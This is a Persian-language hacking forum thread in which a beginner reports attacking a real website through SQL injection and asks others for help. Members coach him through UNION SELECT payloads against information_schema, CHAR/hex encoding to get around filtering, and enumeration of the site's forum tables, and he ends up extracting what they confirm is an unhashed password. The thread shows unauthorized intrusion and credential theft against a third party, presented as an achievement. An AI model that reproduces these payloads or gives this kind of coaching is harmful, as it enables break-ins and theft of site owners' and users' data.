سلام دوستان
من دارم برای اولین بار موفق به هک کردن میشم!!!
من یه تارگت پیدا کردم که باگ sql داره و ورژنش بالای 5 است.کل table و column هاش رو هم دارم؛در میان table ها یه table با نام pass وجود داشت،در میان column هاش هم گشتم تا colmun ی به نام passwd یا چیزی تو این مایه ها پیدا کنم و بتونم بگم این column متعلق به جدول pass هست ولی یه column با نام ID وجود داشت بقیه هم اینا هستن:
CHARACTER_SET_NAME,DEFAULT_COLLATE_NAME,DESCRIPTIO N,MAXLEN,COLLATION_NAME,CHARACTER_SET_NAME,ID,IS_D EFAULT,IS_COMPILED,SORTLEN,COLLATION_NAME,CHARACTE R_SET_NAME,TABLE_CATALOG,TABLE_SCHEMA,TABLE_NAME,C OLUMN_NAME,ORDINAL_POSITION,COLUMN_DEFAULT,IS_NULL ABLE,DATA_TYPE,CHARACTER_MAXIMUM_LENGTH,CHARACTER_ OCTET_LENGTH,NUMERIC_PRECISION,NUMERIC_SC
من با دستور زیر خواستم به اطلاعات این column برسم ولی گویا این column متعلق به این table نیست!
[Only registered and activated users can see links](OR DINAL_POSITION),3,4,5,6,7,8,9+from+pass--90
البته این 90 آخری زیادیه!
حالا در ادامه از کجا بفهمم column های جدول pass کدومه؟

این سئوال رو باید تو قسمت Inject می پرسیدی.
union select column_name from table
column_name=id
table=pass
من ساختار کلیش رو گفتم
موفق باشید

این سئوال رو باید تو قسمت Inject می پرسیدی.

column_name=id
table=pass
من ساختار کلیش رو گفتم
موفق باشید

با عرض معذرت که سوال رو تو جای مخصوصش نپرسیدم
من دستور زیر رو زدم :
[Only registered and activated users can see links] concat(column_name),3,4,5,6,7,8,9+from+information _schema.columns+where+Table_name='pass'
ولی باز error داد،فکر میکنم باید اسم جدول رو کد کنم؟
بلد نیستم pass رو hash کنم!
کمک کنید!

Last edited by win98; امروز at 11:54 PM.
شما پست رو edit نکن سئوال جدیدت رو تو یه پست جدید بپرس.
اینطوری ارشیو خراب میشه.بعدا یکی می خواد استفاده کنه نمی فهمه چی به چیه.
union select column_name from information_schema.column where table_name='pass'

موفق باشید

با عرض معذرت که سوال رو تو جای مخصوصش نپرسیدم
من دستور زیر رو زدم :
[Only registered and activated users can see links] concat(column_name),3,4,5,6,7,8,9+from+information _schema.columns+where+Table_name='pass'
ولی باز error داد،فکر میکنم باید اسم جدول رو کد کنم؟
بلد نیستم pass رو hash کنم!
کمک کنید!

error رو قرار بده.

با عرض معذرت که سوال رو تو جای مخصوصش نپرسیدم
من دستور زیر رو زدم :
[Only registered and activated users can see links] concat(column_name),3,4,5,6,7,8,9+from+information _schema.columns+where+Table_name='pass'
ولی باز error داد،فکر میکنم باید اسم جدول رو کد کنم؟
بلد نیستم pass رو hash کنم!
کمک کنید!

دوست عزیز باید بگید پسوردتون چه نوع هشی هست md5 ntlm or...تا بتونم بهتون کمک کنم!

اینم error که WinNuke خواسته بود:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/u46150/mag-projectru/[Only registered and activated users can see links] on line 59



شاید اگه pass رو مثلا بصورت زیر در بیاریم که من اسمش رو هم نمیدونم درست بشه:
char(65,22,32)l

من با دستور زیر یه کارایی کردم،یعنی نام table هایی که column ی با نام pass دارند رو سرچیدم

[Only registered and activated users can see links] cat(Table_name),3,4,5,6,7,8,9+from+information_sch ema.columns+where+column_name+like+CHAR(37,%20117, %20115,%20101,%20114,%2037)

اینم نتیجه:

PROFILING,guest,phpjj_acl_users,phpjj_banlist,phpj j_bookmarks,phpjj_bots,phpjj_disallow,phpjj_drafts ,phpjj_forums_access,phpjj_forums_track,phpjj_foru ms_watch,phpjj_log,phpjj_moderator_cache,phpjj_mod erator_cache,phpjj_poll_votes,phpjj_poll_votes,php jj_posts,phpjj_posts,phpjj_privmsgs,phpjj_privmsgs _folder,phpjj_privmsgs_rules,phpjj_privms

بچه ها نتیج داد: اینو دستور رو زدم:
[Only registered and activated users can see links](pa ss),3,4,5,6,7,8,9+from+pass--

و نتیجه jadmin بود که نمیدونم پسوورده یا یوزرنیم!
کمککنید!

دوست عزیز اینطور مواقعی
از Hexو unhex و char استفاده میشه
خوب این پسورد هستش
حالا یه چیزی مثل user یا username یا user_name تو این مایها باید باشه
اونم ممیشه userش شاید id هم باشه ولی احتمالش کمه.
پسوردم هش نیست
موفق باشید=موفق شدی:cool: